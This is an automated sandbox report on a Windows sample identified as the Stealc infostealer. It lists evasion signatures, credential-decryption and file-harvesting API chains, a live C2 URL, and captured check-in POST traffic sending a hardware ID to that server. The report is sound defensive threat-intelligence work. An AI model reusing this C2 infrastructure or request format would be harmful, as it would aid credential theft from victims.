Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1561690
MD5:358f03c97356f147bacbfe66db998b47
SHA1:86778c0cabcb58f05672a91feb182eecef95e8b8
SHA256:292c01862fad9dc3ab9a0348756832a5f44273ea50b23088f77fa0e5acaec7d4
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 2664 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 358F03C97356F147BACBFE66DB998B47)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000001.00000003.2210616498.0000000004E10000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000001.00000002.2252021419.0000000000FDE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 2664JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 2664JoeSecurity_StealcYara detected StealcJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-24T05:11:17.649446+010020442431Malware Command and Control Activity Detected192.168.2.649714185.215.113.20680TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: file.exeAvira: detected
              Antivirus detection for URL or domain
              Source: http://185.215.113.206//oY=Avira URL Cloud: Label: malware
              Source: http://185.215.113.206/ToN=Avira URL Cloud: Label: malware
              Found malware configuration
              Source: file.exe.2664.1.memstrminMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
              Multi AV Scanner detection for submitted file
              Source: file.exeVirustotal: Detection: 51%Perma Link
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: file.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00434C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,1_2_00434C50
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004360D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,1_2_004360D0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004540B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,1_2_004540B0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00446960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,1_2_00446960
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0043EA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,1_2_0043EA30
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00446B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,1_2_00446B79
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00439B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,1_2_00439B20
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00439B80 CryptUnprotectData,LocalAlloc,LocalFree,1_2_00439B80
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00437750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,1_2_00437750
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004418A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_004418A0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00443910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00443910
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00441250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00441250
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00441269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00441269
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0044E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_0044E210
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00444B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_00444B10
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00444B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_00444B29
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0044CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_0044CBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0043DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_0043DB80
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00442390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,1_2_00442390
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0043DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_0043DB99
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004423A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_004423A9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0044D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_0044D530
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0044DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,1_2_0044DD30
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004316A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_004316A0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004316B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_004316B9

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49714 -> 185.215.113.206:80
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: http://185.215.113.206/c4becf79229cb002.php
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCGIJDBAFCBAAKECGDGCHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 44 42 41 46 43 42 41 41 4b 45 43 47 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 38 41 38 35 46 39 43 46 41 36 33 37 34 38 31 34 30 37 33 31 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 44 42 41 46 43 42 41 41 4b 45 43 47 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 44 42 41 46 43 42 41 41 4b 45 43 47 44 47 43 2d 2d 0d 0a Data Ascii: ------FCGIJDBAFCBAAKECGDGCContent-Disposition: form-data; name="hwid"A8A85F9CFA63748140731------FCGIJDBAFCBAAKECGDGCContent-Disposition: form-data; name="build"mars------FCGIJDBAFCBAAKECGDGC--
              Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
              Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00436C40 lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,lstrcpy,1_2_00436C40
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: unknownHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCGIJDBAFCBAAKECGDGCHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 44 42 41 46 43 42 41 41 4b 45 43 47 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 38 41 38 35 46 39 43 46 41 36 33 37 34 38 31 34 30 37 33 31 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 44 42 41 46 43 42 41 41 4b 45 43 47 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 43 47 49 4a 44 42 41 46 43 42 41 41 4b 45 43 47 44 47 43 2d 2d 0d 0a Data Ascii: ------FCGIJDBAFCBAAKECGDGCContent-Disposition: form-data; name="hwid"A8A85F9CFA63748140731------FCGIJDBAFCBAAKECGDGCContent-Disposition: form-data; name="build"mars------FCGIJDBAFCBAAKECGDGC--
              Source: file.exe, 00000001.00000002.2252021419.0000000000FDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
              Source: file.exe, 00000001.00000002.2252021419.0000000000FDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206%
              Source: file.exe, 00000001.00000002.2252021419.0000000001038000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2252021419.0000000000FDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
              Source: file.exe, 00000001.00000002.2252021419.0000000001038000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206//oY=
              Source: file.exe, 00000001.00000002.2252021419.0000000001038000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/ToN=
              Source: file.exe, 00000001.00000002.2252021419.0000000001053000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2252021419.0000000001038000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2252021419.0000000000FDE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.2252021419.0000000001044000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
              Source: file.exe, 00000001.00000002.2252021419.0000000001038000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
              Source: file.exe, 00000001.00000002.2252021419.0000000001053000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phph
              Source: file.exe, 00000001.00000002.2252021419.0000000001038000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/ws
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00439770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,memset,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,memset,Sleep,CloseDesktop,1_2_00439770

              System Summary

              barindex
              PE file contains section with special chars
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004548B01_2_004548B0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_007F81741_2_007F8174
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_006E81CA1_2_006E81CA
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_007FD9AC1_2_007FD9AC
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0080C2811_2_0080C281
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_007F4AE41_2_007F4AE4
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00803A6D1_2_00803A6D
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_006B5A841_2_006B5A84
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_007F9B731_2_007F9B73
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00720BEB1_2_00720BEB
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_008004281_2_00800428
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_007D4D461_2_007D4D46
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_007FB5991_2_007FB599
